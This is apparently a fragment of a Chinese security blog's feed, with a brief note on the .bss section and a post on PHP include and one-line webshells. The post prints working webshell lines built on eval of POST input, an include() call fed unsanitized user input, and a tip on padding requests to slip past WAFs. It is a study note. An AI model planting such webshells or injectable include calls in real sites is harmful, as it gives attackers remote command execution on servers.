<content type="html"><![CDATA[<h1 id="bss节区"><a href="#bss节区" class="headerlink" title=".bss section"></a>.bss section</h1><h2 id="bss节区简介"><a href="#bss节区简介" class="headerlink" title="Overview of the .bss section"></a>Overview of the .bss section</h2><p>The .bss section holds the program's uninitialized global and static variables; it is normally zero-filled before the program starts executing. Its size is determined by the number and size of the uninitialized global and static variables in the program.</p><h2 id="bss节区的特点"><a href="#bss节区的特点" class="headerlink" title="Characteristics of the .bss section"></a>Characteristics of the .bss section</h2><p>It can be used for anti-dumping.</p>]]></content>
<categories>
<category>Course</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>PHP one-line webshell</title>
<link href="/2024/10/09/php%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/"/>
<url>/2024/10/09/php%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/</url>
<content type="html"><![CDATA[<p>A look at PHP's include function, and along the way at the various forms of the one-line webshell (一句话木马).</p><h2 id="include函数"><a href="#include函数" class="headerlink" title="The include function"></a>The include function</h2><p>In PHP, include pulls in a file; if the file does not exist, a warning is raised but the script continues executing.</p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><?php<br>include 'test.php';<br>echo 'hello world';<br>?><br></code></pre></td></tr></table></figure><p>If test.php does not exist, a warning is raised but the script continues and prints hello world.<br>The file name can also be made dynamic:</p><figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><?php<br>$NSS=$_POST['NSS'];<br>echo $NSS;<br>highlight_file($NSS);<br>include($NSS);<br>?><br></code></pre></td></tr></table></figure><h2 id="木马举例"><a href="#木马举例" class="headerlink" title="Webshell examples"></a>Webshell examples</h2><blockquote><?php @eval($_POST['cmd']); ?><br><?php @eval($_POST[1]); ?><p>Briefly, these two shells behave the same; the only difference between a numeric and a string key is whether quotes are needed.<br>One-line webshells usually use POST rather than GET, because GET parameters are size-limited, which makes padding with junk data against some WAFs inconvenient and prevents constructing malformed requests.</p></blockquote>]]></content>
<categories>
<category>Network</category>
</categories>
<tags>